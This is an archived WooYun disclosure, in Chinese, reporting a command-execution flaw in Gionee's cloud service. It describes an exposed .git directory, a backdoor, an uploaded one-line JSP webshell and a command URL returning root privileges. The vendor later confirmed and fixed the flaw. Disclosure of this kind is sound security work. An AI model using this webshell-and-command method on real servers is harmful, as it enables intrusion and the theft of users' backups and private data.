漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0170928
漏洞标题:金立手机云服务系统沦陷上千万用户云备份云网盘内容及手机隐私可被窃取
相关厂商:gionee.com
漏洞作者: 路人甲
提交时间:2016-01-18 20:08
修复时间:2016-01-20 14:27
公开时间:2016-01-20 14:27
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-20: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
详细说明:
http://id.gionee.com/members/start#/ 金立云服务系统。自动备份用户手机相册、通讯录、手机定位。。。金立手机多少用户? 危害就有多大。
先是一个git泄漏http://id.gionee.com/.git/
下载到网站源码。然后发现后门一个。应该是运维放上去的吧。反正部署git的时候就有了
然后我就随手传了一个园长的一句话。
http://id.gionee.com/2l.jsp?pwd=023&i=id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root权限,拿到了服务器root也就说明整个云服务系统沦陷了把。。
用户数据我就不看了
漏洞证明:
http://id.gionee.com/members/start#/ 金立云服务系统。自动备份用户手机相册、通讯录、手机定位。。。金立手机多少用户? 危害就有多大。
先是一个git泄漏http://id.gionee.com/.git/
下载到网站源码。然后发现后门一个。应该是运维放上去的吧。反正部署git的时候就有了
然后我就随手传了一个园长的一句话。
http://id.gionee.com/2l.jsp?pwd=023&i=id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root权限,拿到了服务器root也就说明整个云服务系统沦陷了把。。
用户数据我就不看了
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2016-01-19 15:49
厂商回复:
感谢,这个是已知问题。谢谢
最新状态:
2016-01-20:更正一下:问题不是已知问题,是新漏洞.现在已经进行修复。再次进行感谢!!!!